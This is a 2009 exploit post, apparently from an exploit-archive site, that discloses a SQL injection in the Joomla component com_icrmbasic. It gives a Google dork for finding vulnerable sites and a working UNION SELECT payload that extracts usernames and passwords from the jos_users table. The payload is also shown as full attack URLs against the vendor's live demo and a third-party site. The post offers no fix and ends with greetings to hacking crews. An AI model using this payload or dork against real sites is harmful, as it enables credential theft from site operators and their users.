|    |    |    | Today: 18-Nov-2019 |

Joomla Component com_ircmbasic SQL injection vulnerability

September 29, 2009 | Posted in ExploitAlert


################################################################################################
## Joomla Component com_ircmbasic SQL injection vulnerability ##
## Author : kaMtiEz (kamzcrew@gmail.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 27, 2009 ##
################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-##
################################################################################################

[ Software Information ]

[+] Vendor : http://www.isygen.com/
[+] Download : http://www.isygen.com/index.php?option=com_content&view=article&id=53:icrmbasic&catid=34:general&Itemid=481
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_icrmbasic"
[+] Location : INDONESIA

################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_icrmbasic&p1=m6&p3=[INDONESIANCODER]&p20=oab&p4=Contacts&p5=en-GB&Itemid=483

[ Exploit ]

-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--

[ Vendor Demo Using com_icrmbasicdemo ]

http://www.isygen.com/index.php?option=com_icrmbasicdemo&v672=Contacts&v669=v694&v675=oab&v660=main&v656=-10+union+select+1,concat_ws(0x3a,username,password),3,password,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version()tukulesto,21,22,23,24+from+jos_users--&v658=en-GB&Itemid=483

[ The Real com_icrmbasic Demo ]

http://ithinkbiz.com/index.php?option=com_icrmbasic&p1=m6&p3=-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--&p20=oab&p4=Contacts&p5=en-GB&Itemid=483

################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER, TEAM KILL-9 CREW, KIRIK CREW, ServerIsDown, AntiSecurity.org
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Jack-, Yadoy666, Pathloader, abah_benu, VycOd,
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz, och3_an3h
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s, rendy, devil_nongkrong and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^

Taged in: component, injection, ircmbasic, Joomla, vulnerability